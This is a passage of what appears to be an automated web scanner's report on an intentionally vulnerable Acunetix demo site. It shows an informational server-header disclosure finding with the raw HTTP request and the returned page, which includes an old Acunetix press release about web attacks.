12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> 